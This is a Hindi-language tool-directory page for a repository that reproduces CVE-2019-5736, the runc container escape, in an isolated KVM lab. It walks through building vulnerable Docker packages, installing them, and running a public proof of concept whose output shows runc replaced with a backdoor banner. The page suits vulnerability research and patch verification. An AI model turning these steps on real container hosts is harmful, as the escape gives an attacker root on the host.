Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2019-5736-reproducer — CVE-2019-5736 के लिए रिप्रोड्यूसर, जो RunC कंटेनर एस्केप भेद्यता है। कमजोर Docker पैकेजों के खिलाफ एक्सप्लॉइट की पुष्टि करने के लिए बिल्ड स्क्रिप्ट और KVM-आधारित लैब प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/takumak/cve-2019-5736-reproducer
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणक्लाउड सुरक्षालर्निंग और शिक्षाकंटेनर एस्केप
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

CVE-2019-5736 के लिए रिप्रोड्यूसर, जो RunC कंटेनर एस्केप भेद्यता है। कमजोर Docker पैकेजों के खिलाफ एक्सप्लॉइट की पुष्टि करने के लिए बिल्ड स्क्रिप्ट और KVM-आधारित लैब प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
74 साल पहलेअभी तक समीक्षित नहीं

CVE-2019-5736 पुनरुत्पादक

यह आपको अपने KVM इंस्टेंस पर RunC-CVE-2019-5736 के काम करने की पुष्टि करने देता है।

कार्यप्रवाह अवलोकन

  • इस रिपॉजिटरी में CVE-2019-5736 के प्रति संवेदनशील docker.io से संबंधित पैकेज बनाएं
  • LXD पर Ubuntu 18.04 KVM इंस्टेंस लॉन्च करें
  • VM में संवेदनशील *.deb पैकेज इंस्टॉल करें
  • RunC-CVE-2019-5736 पर प्रस्तुत प्रक्रिया आज़माएँ

संवेदनशील *.deb पैकेज बनाएं

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

RunC-CVE-2019-5736 स्रोत टारबॉल तैयार करें

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

LXD पर Ubuntu 18.04 KVM इंस्टेंस लॉन्च करें

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

ध्यान दें कि आपको ubuntu:18.04 के बजाय images:ubuntu/18.04 का उपयोग करना चाहिए, क्योंकि lxc exec कमांड बाद वाले के साथ ठीक से काम नहीं करता है।

RunC-CVE-2019-5736 को पुनरुत्पादित करें

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

परिशिष्ट

  • फिक्स कमिट: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
टूल डाउनलोड करें